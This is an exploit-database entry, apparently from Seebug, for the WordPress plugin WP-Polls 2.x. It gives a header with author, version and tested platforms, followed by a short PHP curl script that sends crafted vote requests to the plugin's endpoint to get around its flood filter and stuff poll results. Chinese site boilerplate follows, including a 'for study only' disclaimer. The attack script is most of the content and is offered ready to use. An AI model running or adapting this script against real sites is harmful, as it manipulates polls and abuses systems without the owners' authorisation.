# Exploit Title: WP-Polls 2.x Incorrect Flood Filter # Date: 30/11/2009 # Author: Jbyte (jbyte-security.blogspot.com) # Software Link: http://lesterchan.net/wordpress/readme/wp-polls.html # Version: 2.x # Tested on: Windows 7/windows xp/ ubuntu 9.04/ ubuntu 9.10 # Code : <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://server/wp-content/plugins/wp-polls/wp-polls.php"); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_POSTFIELDS,"vote=true&poll_id=ID survey here&poll_7=ID to vote here"); curl_exec($ch); curl_close($ch); ?>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论